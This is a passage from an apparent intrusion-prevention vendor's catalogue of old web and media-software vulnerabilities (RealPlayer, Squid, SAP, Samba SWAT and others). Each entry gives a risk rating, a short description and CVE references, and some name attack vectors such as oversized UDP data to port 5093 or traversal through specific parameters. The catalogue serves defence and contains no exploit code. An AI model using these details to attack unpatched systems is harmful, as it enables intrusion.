Description: The Netscape PublishingExpert can be exploited to reveal any file on the system by specifying the file path in the errPagePath variable.
References:
CVE-2000-1196
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1196
Back to top

HTTP-Py-Software-Active-Webcam-Webserver-Floppy-DoS

About this vulnerability: PY software's Active Webcam Webserver floppy disk request DoS
Risk: Moderate
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PY Software Active Webcam Webserver
Type: Malfunction
Description: PY Software's Active Webcam Webserver has a vulnerability that may lead to denial of service. When a request is made to a file on the floppy drive, for example a:\file.txt, the server tries to open it. If no floppy disk is present, a popup will open on the server asking for a floppy. Until the popup is closed, no other HTTP requests are processed by the server.
Situation: HTTP_CSU-Py-Software-Active-Webcam-Webserver-Floppy-DoS
References:
CVE-2005-0730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0730
BID-12778
http://www.securityfocus.com/bid/12778
Back to top

HTTP-RealPlayer-AVI-Parsing-Buffer-Overflow

About this vulnerability: Heap based AVI parsing buffer overflow vulnerability in Realplayer
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer; RealOne Player; Rhapsody
Type: Buffer Overflow
Description: Realplayer has a heap based AVI parsing buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted AVI file with a vulnerable product, causing a DoS or non-privileged arbitrary code execution.
Situation: HTTP_RealPlayer-AVI-Parsing-Buffer-Overflow
File-RIFF_RealPlayer-AVI-Parsing-Buffer-Overflow
References:
CVE-2005-2052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2052
BID-13530
http://www.securityfocus.com/bid/13530
OSVDB-17576
http://www.osvdb.org/17576
Back to top

HTTP-RealPlayer-RAM-File-Processing-Buffer-Overflow

About this vulnerability: Heap based buffer overflow vulnerability in Realplayer
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer; RealOne Player; Helix Player
Type: Buffer Overflow
Description: Realplayer has a heap based buffer overflow vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted RAM formatted file with a vulnerable product, causing a DoS or arbitrary code execution with the privileges of the currently logged in user.
Situation: HTTP_RealPlayer-RAM-File-Processing-Buffer-Overflow
File-Text_RealPlayer-RAM-File-Processing-Buffer-Overflow
References:
CVE-2005-0755
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0755
BID-13264
http://www.securityfocus.com/bid/13264
OSVDB-15710
http://www.osvdb.org/15710
Back to top

HTTP-RealPlayer-Realpix-And-Realtext-Format-String-Compromise

About this vulnerability: RealPlayer Realpix and Realtext media format string compromise
Risk: High
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: RealPlayer; Helix Player
Type: Format String
Description: UNIX RealPlayer and Helix Player have a format string vulnerability in the handling of realpix and realtext files. Specially-crafted files can be used to execute arbitrary code when viewed with a vulnerable version of the players. Remote attackers can exploit the vulnerability by placing the malicious file on a webserver and tricking a victim into opening it.
Situation: HTTP_RealPlayer-Realpix-And-Realtext-Format-String-Compromise
File-Text_RealPlayer-Realpix-And-Realtext-Format-String-Compromise
References:
CVE-2005-2710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2710
BID-14945
http://www.securityfocus.com/bid/14945
Back to top

HTTP-RealPlayer-SMIL-Screen-Size-System-Compromise

About this vulnerability: RealPlayer .SMIL screen size parameter buffer overflow vulnerability
Risk: High
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RealPlayer; RealOne Player
Type: Buffer Overflow
Description: RealPlayer 10.5 and earlier have a buffer overflow vulnerability in the handling of SMIL files. A .SMIL file containing a long screen-size attribute will cause a buffer overflow allowing arbitrary code execution. The vulnerability can be exploited by remote attackers by convincing a user to open the malicious .SMIL with a vulnerable version of the software, or by tricking users to browse to a web page that contains the file. In default RealPlayer Windows installations, the Internet Explorer will open the .smil file without prompting the user.
Situation: HTTP_RealPlayer-SMIL-Screen-Size-System-Compromise
File-TextId_RealPlayer-SMIL-Screen-Size-System-Compromise
References:
CVE-2005-0455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0455
BID-12698
http://www.securityfocus.com/bid/12698
Back to top

HTTP-Redirect-To-Non-HTTP-URI

About this vulnerability: A HTTP redirection to a non-HTTP URI was detected
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: A HTTP redirection to a non-HTTP URI was detected
Situation: HTTP_SHS-HTTP-Redirect-To-Non-HTTP-URI
Back to top

HTTP-Request-Command-Execution

About this vulnerability: A possible attempt to run remote commands
Risk: Moderate
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: A possible attempt to run remote commands
Situation: HTTP_CSU-HTTP-Request-Command-Execution
Back to top

HTTP-Request-To-0.0.0.0

About this vulnerability: A browser security feature bypass
Risk: Moderate
First detected in: sgpkg-ips-1763-5242
Last changed: sgpkg-ips-1763-5242
Platform: Generic
Software: Chrome; Safari; Mozilla Firefox
Type: Malfunction
Description: HTTP requests to address 0.0.0.0 are be able to bypass PNA (Private Network Access) restrictions on various browsers. Malicious actors can exploit this flaw to interact with services that are intended to be available only on the local network.
Situation: File-Text_HTTP-Request-To-0.0.0.0-In-Script
Back to top

HTTP-Response-Splitting-XSS

About this vulnerability: A vulnerability in Apache Software Foundation HTTP Server
Risk: Moderate
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache2; Apache Tomcat
Type: Cross-site Scripting
Description: A technique has been disclosed permitting attack upon web clients via web-based applications and web caches. This technique is known as "HTTP response splitting" This vulnerability affects a wide variety of systems and software using the HTTP protocol, including most of the most widely deployed Web server software products. Once an attack has been mounted on the target successfully, the header of the response from the vulnerable target will have been split into two parts, and the second part of the legitimate header has become the content of the message body, which would be interpreted as the response to a second request by the client. The attack will have various resulting effects, depending on the attack vector: Through a cache server: a successful attack will poison the cache server, any request by a client to the legitimate target through the poisoned cache server will be responded to with malicious data. Through a malicious page: once any victim client browser visits the malicious page, an attack is mounted against the vulnerable target and the local cache of the browser is poisoned. Any further request to the legitimate target through this browser will replaced with the malicious, cached content.
Situation: HTTP_CSU-Poison-Response-Splitting-Query
Back to top

HTTP-Roads-File-Disclosure-Vulnerability

About this vulnerability: Roads File Disclosure Vulnerability
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Martin Hamilton ROADS
Type: Directory Traversal
Description: Roads contains a vulnerability which allows an attacker to view arbitary files on the victim system with a specifically crafted URL.
Situation: HTTP_CSU-Roads-File-Disclosure
References:
CVE-2001-0215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0215
BID-2371
http://www.securityfocus.com/bid/2371
Back to top

HTTP-RodClark-sendform.cgi-Blurb-File-Disclosure

About this vulnerability: File disclosure in Rod Clark's sendform.cgi.
Risk: Low
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rod Clark sendform.cgi
Type: Malfunction
Description: Certain versions of Rod Clark's sendfrom.cgi can be tricked to disclose contents of any file the webserver has access to.
Situation: HTTP_CRL-RodClark-sendform.cgi-Blurb-File-Disclosure
References:
CVE-2002-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0710
BID-5286
http://www.securityfocus.com/bid/5286
OSVDB-3568
http://www.osvdb.org/3568
Back to top

HTTP-Roundup-Directory-Traversal

About this vulnerability: Roundup allows reading arbitrary files
Risk: Low
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1637-5242
Platform: Linux
Software: Richard Jones Roundup
Type: Directory Traversal
Description: Richard Jones Roundup allows remote users to access arbitrary files from the host. Remote attackers can exploit the vulnerability by sending an '@@file'
References:
CVE-2004-1444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1444
BID-10495
http://www.securityfocus.com/bid/10495
Back to top

HTTP-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF

About this vulnerability: Buffer overflow vulnerability in RSA Authentication Agent for Web for IIS
Risk: High
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RSA Security RSA Authentication for Web for IIS; IIS
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in the RSA Authentication Agent for Microsoft Internet Information Server (IIS). The flaw is triggered when the vulnerable component parses crafted HTTP data. Successful exploitation can allow arbitrary code to be executed with System level privileges on the target system.
Situation: HTTP_CCH-RSA-Authentication-Agent-For-Web-Chunked-Encoding-BOF
References:
CVE-2005-1471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1471
BID-13524
http://www.securityfocus.com/bid/13524
Back to top

HTTP-RSA-Authentication-Agent-For-Web-Redirect-BOF

About this vulnerability: Buffer overflow vulnerability in RSA Authentication Agent for Web for IIS
Risk: High
First detected in: sgpkg-ips-44-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RSA Security RSA Authentication for Web for IIS; IIS
Type: Buffer Overflow
Description: RSA Security RSA Authentication Agent for Web for IIS has a buffer overflow vulnerability in the processing of Redirect requests. An URL variable of over 256 bytes will overflow a buffer, allowing arbitrary code execution with SYSTEM privileges. No authentication is required to exploit the vulnerability.
Situation: HTTP_CRL-RSA-Authentication-Agent-For-Web-Redirect-BOF
References:
CVE-2005-4734
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4734
BID-26424
http://www.securityfocus.com/bid/26424
OSVDB-20151
http://www.osvdb.org/20151
Back to top

HTTP-Safenet-License-Manger-UDP-Buffer-Overflow

About this vulnerability: Safenet license manager buffer overflow vulnerability
Risk: Critical
First detected in: sgpkg-ips-23-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SafeNet Sentinel
Type: Buffer Overflow
Description: The Safenet Sentinel License Manager has a buffer overflow vulnerability, which can be triggered by sending a large amount of data to the udp port 5093. To exploit the overflow around 3900 bytes of data needs to be sent. A successful exploit allows arbitrary code execution on the server.
Situation: Generic_Safenet-License-Manager-UDP-Buffer-Overflow
References:
CVE-2005-0353
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0353
BID-12742
http://www.securityfocus.com/bid/12742
Back to top

HTTP-Samba-Swat-Authentication-Base64-BOF

About this vulnerability: Buffer overflow in Samba SWAT http authentication while decoding an invalid base64 character
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1589-5242
Platform: Linux
Software: Samba
Type: Buffer Overflow
Description: Samba SWAT is vulnerable to a buffer overflow during HTTP authentication, when SWAT decodes base64 data. A remote attacker could supply an invalid base64 character, thus overflowing a buffer and possibly executing arbitrary code.
Situation: HTTP_CS-Samba-Swat-Authentication-Base64-BOF
References:
CVE-2004-0600
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0600
BID-10780
http://www.securityfocus.com/bid/10780
Back to top

HTTP-Sambar-Bat-Command-Execution-Vulnerability

About this vulnerability: Sambar server's test .bat files allow command execution
Risk: High
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Sambar Server
Type: Directory Traversal
Description: The Sambar server's default installation includes echo.bat and hello.bat in the cgi-bin/ directory. These .bat files can be used by a remote attacker to run arbitrary commands on the server.
References:
CVE-2000-0213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0213
BID-1002
http://www.securityfocus.com/bid/1002
Back to top

HTTP-Sambar-Dumpenv-Pl-Information-Disclosure

About this vulnerability: Sambar default script prints environment variables.
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: Sambar Server
Type: Insecure Configuration
Description: The Sambar Server 4.1 beta installs by default the dumpenv.pl script, which could give remote attackers an environment list of the server.
References:
CVE-1999-1178
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1178
Back to top

HTTP-Sambar-Search-DLL-Directory-Disclosure

About this vulnerability: Sambar Search DLL Directory Disclosure
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sambar Server
Type: Directory Traversal
Description: The Sambar Server contains a vulnerability which can be exploited to see the contents of a directory.
Situation: HTTP_CSU-Sambar-Search-DLL-Directory-Listing-Disclosure
References:
CVE-2000-0835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0835
BID-1684
http://www.securityfocus.com/bid/1684
Back to top

HTTP-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability

About this vulnerability: SAP DB Web Server buffer overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-151-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP DB
Type: Buffer Overflow
Description: The SAP DB Web Server (waHTTP.exe) suffers from buffer overflow vulnerabilities in the handling of specially crafted URLs. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable system by sending malicious HTTP requests.
Situation: HTTP_CRL-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
HTTP_CSU-SAP-Db-Web-Server-Buffer-Overflow-Vulnerability
References:
CVE-2007-3614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3614
BID-24773
http://www.securityfocus.com/bid/24773
OSVDB-37838
http://www.osvdb.org/37838
Back to top

HTTP-SAP-Internet-Transaction--Server-Information-Disclosure

About this vulnerability: SAP Internet Transaction Server Information Disclosure
Risk: Moderate
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP Internet Transaction Server
Type: Input Validation
Description: The SAP Internet Transaction Server suffers from input validation vulnerabilities in the handling of specially crafted URLs. The vulnerability allows remote attackers to obtain potentially sensitive information such as directory structure and operating system via incorrect parameters.
Situation: HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-Information-Disclosure
References:
CVE-2003-0747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0747
BID-8515
http://www.securityfocus.com/bid/8515
Back to top

HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Arbitrary-File-Disclosure

About this vulnerability: SAP Internet Transaction Server wgate.dll arbitrary file disclosure
Risk: Low
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: SAP Internet Transaction Server
Type: Malfunction
Description: SAP Internet Transaction Server wgate.dll allows remote attackers to read arbitrary files from the server by sending specially crafted requests. Directory traversal sequences passed to the ~theme parameter and ~template parameter with a filename followed by space characters can lead to the server returning the selected file.
References:
CVE-2003-0748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0748
BID-8516
http://www.securityfocus.com/bid/8516
Back to top

HTTP-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting

About this vulnerability: SAP Internet Transaction Server wgate.dll cross site scripting vulnerability
Risk: Low
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP Internet Transaction Server
Type: Cross-site Scripting
Description: SAP Internet Transaction Server wgate.dll allows remote attackers to insert arbitrary script code into the ~service parameter, which can be used in cross-site scripting attacks.
Situation: HTTP_CRL-SAP-Internet-Transaction-Server-Wgate-DLL-Cross-Site-Scripting
References:
CVE-2003-0749
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0749
BID-8517
http://www.securityfocus.com/bid/8517
Back to top

HTTP-SAP-Message-Srv-Server-Group-Parameter-BOF

About this vulnerability: SAP Message Server buffer overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-341-4219
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: SAP
Type: Buffer Overflow
Description: The SAP Message Web Server suffers from buffer overflow vulnerabilities in the handling of specially crafted URLs. The vulnerability allows remote attackers to execute arbitrary code on a vulnerable system by sending malicious HTTP requests.
Situation: HTTP_CSU-SAP-Messenger-Web-Server-Buffer-Overflow-Vulnerability
References:
CVE-2007-3624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3624
BID-24765
http://www.securityfocus.com/bid/24765
OSVDB-38096
http://www.osvdb.org/38096
Back to top

HTTP-Serendipity-Exit-Php-SQL-Injection

About this vulnerability: Serendipity exit.php SQL injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: S9Y Serendipity
Type: SQL Injection
Description: Serendipity is a PHP based weblog/blog software. The application suffers from an SQL injection vulnerability, which allows remote attackers to do arbitrary SQL queries by including the query into exit.php's 'url_id' or 'entry_id' parameters.
Situation: HTTP_CSU-Serendipity-Exit-Php-SQL-Injection
References:
CVE-2005-1134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1134
BID-13161
http://www.securityfocus.com/bid/13161
OSVDB-15542
http://www.osvdb.org/15542
Back to top

HTTP-Sgi-Infosearch-Fname-Cmd-Exec

About this vulnerability: Command execution using SGI CGI script infosrch.cgi
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: IRIX
Software: SGI InfoSearch
Type: Malfunction
Description: The infosrch.cgi script in SGI InfoSearch package does not parse properly the user data given in the fname variable. This vulnerability gives a remote attacker an opportunity to execute commands with the Web server privileges.
Situation: HTTP_CRL-Sgi-Cgi-Infosearch-Fname-Usage
References:
CVE-2000-0207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0207
BID-1031
http://www.securityfocus.com/bid/1031
Back to top

HTTP-Sgi-IRIX-Day5datacopier-Cgi-Authentication-Bypass

About this vulnerability: Privilege-level escalation in day5datacopier.cgi.
Risk: High
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: IRIX
Software: <os>
Type: Malfunction
Description: SGI Irix ships with the cgi script day5datacopier.cgi, which is a root-suid binary. By default it's only available to local users, but a misconfigured system or exploitation of many other security issues in Irix 6.2 may expose it to network, leading to potential remote root exploitation.
References:
CVE-1999-1232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1232
OSVDB-8559
http://www.osvdb.org/8559
Back to top

HTTP-Shopper-Cgi-Directory-Traversal

About this vulnerability: Shopper CGI Directory Traversal File Disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Web Shopper
Type: Directory Traversal
Description: The web shopper cgi scipt shopper.cgi does not validate the input variable newpage. An attacker could exploit this by viewing any file on the host system readable by the web servers privileges.
References:
CVE-2000-0922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0922
BID-1776
http://www.securityfocus.com/bid/1776
Back to top

HTTP-SHOUTcast-Request-Format-String-System-Compromise

About this vulnerability: SHOUTcast server format string vulnerability
Risk: High
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1637-5242
Platform: Windows; Linux; OS X
Software: SHOUTcast Server
Type: Format String
Description: Nullsoft SHOUTcast has a format strings vulnerability, that is triggered when parsing client requests for files. The vulnerability allows remote attackers to execute arbitrary code by sending a specially-crafted request to the server.
References:
CVE-2004-1373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1373
BID-12096
http://www.securityfocus.com/bid/12096
Back to top

HTTP-SimpleBBS-Name-Argument-Remote-Code-Execution

About this vulnerability: PHP code in SimpleBBS name argument allows arbitrary php code execution
Risk: Moderate
First detected in: sgpkg-ips-48-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SimpleBBS
Type: PHP Injection
Description: SimpleBBS, a bulleting board system by SimpleMedia, allows arbitrary php code execution. A remote attacker can send PHP code in a specially crafted format as the name of a forum user to SimpleBBS, which will cause the PHP code to be executed later when the message is viewed.
Situation: HTTP_CRL-SimpleBBS-Name-Argument-Remote-Code-Execution
Back to top

HTTP-SimplestGuest-Command-Execution

About this vulnerability: Command-execution vulnerability in 'simplestguest.cgi'
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Leif M. Wright simplestguest.cgi
Type: Malfunction
Description: CGI script 'simplestguest.cgi' by Leif M. Wright has a vulnerability in the way it handles user-supplied input. A remote attacker is able to use this vulnerability to execute arbitrary commands via shell metacharacters on the web server.
Situation: HTTP_CRL-SimplestGuest-Command-Execution
References:
CVE-2001-0022
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0022
BID-2106
http://www.securityfocus.com/bid/2106
Back to top

HTTP-SiteUserMod-Cgi-Authentication-Bypass

About this vulnerability: Root compromise in Cobalt RaQ web administration
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1637-5242
Platform: Linux
Software: Cobalt RaQ
Type: Malfunction
Description: Any user with site administrator access is able to gain server administration privileges by changing the password of the admin account. On RaQ version 3.0, the password of any user but the admin can be changed using this technique. This is done by modifying contents of two frames of the web administration page.
References:
CVE-2000-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0117
BID-951
http://www.securityfocus.com/bid/951
Back to top

HTTP-Snmppd-Syslog-Format-String-System-Compromise

About this vulnerability: Snmppd arbitrary code execution with format strings
Risk: High
First detected in: sgpkg-ips-26-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Snmppd
Type: Format String
Description: Snmppd, a software designed to be a layer between the Nagios network monitoring software and SNMP agents, has a format string vulnerability in versions 0.4.5 and earlier. By sending a specially-crafted message that contains format string modifiers, remote attackers can execute arbitrary code on the server.
Situation: SNMP-TCP_Snmppd-Syslog-Format-String-System-Compromise
References:
CVE-2005-1246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1246
BID-13348
http://www.securityfocus.com/bid/13348
Back to top

HTTP-Sony-Xcp-Content-Protection-Software

About this vulnerability: Sony XCP content protection software traffic
Risk: Moderate
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Sony XCP
Type: Insecure Configuration
Description: Sony XCP content protection software uses rootkit techniques to hide on Windows platforms. Some organizations may consider this software unwanted, and there is also malware that can use the rootkit features of the software to hide their presence.
Situation: HTTP_CS-Sony-Xcp-Content-Protection-Software
Back to top

HTTP-Sophos-Anti-Virus-CHM-File-Heap-Oveflow

About this vulnerability: Heap overflow vulnerbility in Sophos Anti-Virus
Risk: Moderate
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sophos Anti-Virus
Type: Malfunction
Description: There is a heap overflow vulnerability in Sophos Anti-Virus. A malicious, crafted compressed help (CHM) file causes heap overflow in Sophos Anti-Virus' scanning engine. This may lead to arbitrary code execution or denial of service.
Situation: HTTP_Sophos-Anti-Virus-CHM-File-Heap-Overflow
File-Binary_Sophos-Anti-Virus-CHM-File-Heap-Overflow
References:
CVE-2006-5646
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5646
BID-20816
http://www.securityfocus.com/bid/20816
Back to top

HTTP-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection

About this vulnerability: SPIP Spip_RSS.php code injection vulnerability via GLOBALS[type_urls]
Risk: Moderate
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SPIP
Type: PHP Injection
Description: SPIP allows remote attackers to execute arbitrary commands with the web server's privileges. The script spip_access_doc.php3 can be used to inject arbitrary code into the applications log file, and another vulnerability in spip_rss.php could be exploited to include local files. These vulnerabilities can be used together to execute arbitrary commands.
Situation: HTTP_CSU-SPIP-RSS-Php-Globals-Type-URLs-Code-Injection
References:
CVE-2006-0625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0625
BID-16556
http://www.securityfocus.com/bid/16556
OSVDB-23086
http://www.osvdb.org/23086
Back to top

HTTP-Squid-Authentication-Header-DoS

About this vulnerability: Denial of service vulnerability in Squids authentication header handling
Risk: Moderate
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Squid Web Proxy Cache has a vulnerability in the handling of Proxy-Authorization HTTP headers. While using NTLM authorization, the Proxy-Authorization header field in all HTTP requests should begin with a case-sensitive "NTLM ". If this is not the case, Squids proxy server process will terminate and reset all established connections. A Squid monitor process can respawn the proxy server, but the vulnerability allows remote attackers to cause a denial of service by repeatedly sending specially-crafted headers.
Situation: HTTP8080_CS-Squid-Authentication-Header-DoS
References:
CVE-2005-2917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2917
BID-14977
http://www.securityfocus.com/bid/14977
OSVDB-19607
http://www.osvdb.org/19607
Back to top

HTTP-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS

About this vulnerability: Denial of service vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-235-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: There is a denial of service vulnerability in Squid.
Situation: HTTP_SLS-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS
References:
BID-35812
http://www.securityfocus.com/bid/35812
Back to top

HTTP-Squid-Proxy-TRACE-Request-Remote-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in the Squid proxy
Risk: Moderate
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: The Squid proxy has a denial of service vulnerability. The Squid proxy process can be terminated with a crafted TRACE request that has a zero value in the Max-Forwards header field.
Situation: HTTP8080_CS-TRACE-Request-With-Zero-Value-In-Max-Forwards-Header-Field
References:
CVE-2007-1560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1560
BID-23085
http://www.securityfocus.com/bid/23085
Back to top

HTTP-Squid-Web-Proxy-HTTP-Request-Smuggling

About this vulnerability: HTTP request smuggling vulnerability in Squid Web Proxy
Risk: Moderate
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Squid Web Proxy has an HTTP request smuggling vulnerability. The web cache of Squid Web Proxy can be poisoned by sending a crafted HTTP request containing multiple content-length header fields.
References:
CVE-2005-0174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0174
BID-12412
http://www.securityfocus.com/bid/12412
Back to top

HTTP-Stalkerlab-Mailers-File-Disclosure

About this vulnerability: File disclosure in Stalkerlab Mailers 1.1.2
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Stalkerlab Mailers
Type: Malfunction
Description: Stalkerlab Mailers 1.1.2 has a vulnerability in the CGImail.exe that allows a remote attacker to gain read access to arbitrary files on the Web server.
Situation: HTTP_CRL-Stalkerlab-Mailers-CGIMail-Access
References:
CVE-2000-0726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0726
BID-1623
http://www.securityfocus.com/bid/1623
Back to top

HTTP-Subdreamer-Light-Global-Variables-SQL-Injection

About this vulnerability: Subdreamer SQL injection via unfiltered global variables
Risk: Moderate
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subdreamer Light
Type: SQL Injection
Description: Subdreamer Light allows remote attackers to execute arbitrary SQL commands. Some variables used in SQL queries are defined as global in the functions and are not filtered properly against user input. This allows SQL queries to be executed by including them in the vulnerable variables.
Situation: HTTP_CRL-Subdreamer-Light-Global-Variables-SQL-Injection
References:
CVE-2005-0805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0805
BID-12839
http://www.securityfocus.com/bid/12839
Back to top

HTTP-Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation

About this vulnerability: Privilege escalation vulnerability in Sun JRE
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Input Validation
Description: There is a privilege escalation vulnerability in Java Runtime Environment. A malicious java applet can bypass Java classloader security checks allowing access to restricted classes. This allows access to the local system from the applet, including arbitary code execution.
Situation: HTTP_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
File-Binary_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
References:
CVE-2002-0896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0896
BID-8879
http://www.securityfocus.com/bid/8879
Back to top

HTTP-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Sun's Java Virtual Machine
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1413-5242
Platform: Generic
Software: Sun Java Runtime Environment
Type: Malfunction
Description: There is a memory corruption vulnerability in Sun Java Runtime Environment. The vulnerability can be exploited by delivering a malicious Java applet to the target user.
Situation: HTTP_SS-Sun-Java-Runtime-Environment-Native-Methods-Memory-Corruption
Back to top

HTTP-Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Sun Java Web Start
Risk: High
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun Java Web Start
Type: Buffer Overflow
